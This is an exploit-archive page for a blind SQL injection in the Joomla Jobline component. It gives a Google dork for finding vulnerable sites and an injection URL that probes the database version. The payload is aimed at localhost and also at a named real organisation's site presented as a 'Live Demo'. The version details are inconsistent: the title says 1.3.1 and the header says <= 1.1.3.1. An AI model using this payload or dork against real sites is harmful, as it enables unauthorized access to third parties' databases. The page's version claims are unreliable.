[] NeoSense
E X P L O I T S
title author type platform port cve id

Joomla! Component Jobline 1.3.1 - Blind SQL Injection

Author: ManhLuat93
type: webapps
platform: php
port: 
date_added: 2009-07-16 
date_updated:  
verified: 1 
codes: OSVDB-55970;CVE-2009-2554 
tags: 
aliases:  
screenshot_url:  
application_url: 
##################################################
# Joomla Component: Jobline <= 1.1.3.1 (search) / Blind SQL Injection Vulnerability
# Download: http://joomlacode.org/gf/download/frsrelease/3721/8325/jobline-1_1_2_2.zip
# Dork: inurl:"index.php?option=com_jobline"
#  ---> magic_quotes_gpc =Off
# ==================================
# {Author}: ManhLuat93
# {My HomePage}: http://manhluat.com/
##################################################

Live Demo: http://www.ntca.org/index.php?option=com_jobline&task=results&Itemid=&search=

[-] Exploit [+]

[--] http://localh0st/index.php?option=com_jobline&task=results&Itemid=&search=%' and substring(@@version,1,1)=5 and '%'='

[++] http://www.ntca.org/index.php?option=com_jobline&task=results&Itemid=&search=%' and substring(@@version,1,1)=5 and '%'='


note:
<name>Jobline</name>
<creationDate>08 Jan 2008</creationDate>
<version>1.3.1</version>
<joomlaVersion>1.5</joomlaVersion>
<copyright>(c) 2006 Olle Johansson</copyright>
<license>GNU GPL</license>


# milw0rm.com [2009-07-17]
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.